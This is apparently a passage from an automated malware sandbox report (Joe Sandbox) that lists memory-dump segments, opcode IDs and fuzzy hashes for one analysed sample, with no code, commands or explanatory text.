                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5766bbafeec44d2793461aaae4d7b0736171f624e90367f1428f3242677b4087
                                                          • Instruction ID: 0395209a302cff6d2304ec22de2807a71cafda7aae28cb1e5503557b9ee8e3d5
                                                          • Opcode Fuzzy Hash: 5766bbafeec44d2793461aaae4d7b0736171f624e90367f1428f3242677b4087
                                                          • Instruction Fuzzy Hash: E341F277F206280BE35CD9699C6526A73C2E7C4310B4A863DDA96C73C2EC74ED2792C0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                          • Instruction ID: e008a3d90c22e2d70f653831a9084648606e44d0527e3b6abae8eaac31247b58
                                                          • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                          • Instruction Fuzzy Hash: 7031B43170831D4FC714ADA9C4C8B2AFED2BBD8394F558A3CE585D3345EA718C48C682
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                          • Instruction ID: fab5e78a0213476a47effa212b05d37a6afee310d77aac8eb38e8f186d866f44
                                                          • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                          • Instruction Fuzzy Hash: 37F06873B656390B9360CD776D011E7A2C3A7C0770F1F8565DD48D7542D934DC4646C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction ID: 79d1ca7086564c482d1f8d862be7ceb4c745fdbb2a51b582b21c9b21cb12edfe
                                                          • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction Fuzzy Hash: D0F08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC969ECA4E7206E930EC0656D5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae05c8db85b4c63216ae46279220d3e31acdb7096f24a377acadc80197d4179b
                                                          • Instruction ID: 082d0de61960a907aa05f025e46db8463b6c2ce468cf918b824c4d69597967ca
                                                          • Opcode Fuzzy Hash: ae05c8db85b4c63216ae46279220d3e31acdb7096f24a377acadc80197d4179b
                                                          • Instruction Fuzzy Hash: C9B01275F142104B6706CA34ED710D132B27392310795C4EDD00345011D639D002C608
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [
                                                          • API String ID: 0-784033777
                                                          • Opcode ID: 455e2ebbda5dc531c39975dcdbf799dbf2f848f42507929215968a4262b6bf0c
                                                          • Instruction ID: 312bdd402a07453a9ba8a59e883d9c86e261481868e02ef2a484f9615d7c1f49
                                                          • Opcode Fuzzy Hash: 455e2ebbda5dc531c39975dcdbf799dbf2f848f42507929215968a4262b6bf0c
                                                          • Instruction Fuzzy Hash: B0B169715383435BDB358E20889C77BBBD8EB57318F1C092EE8C5C6181EF65C8688762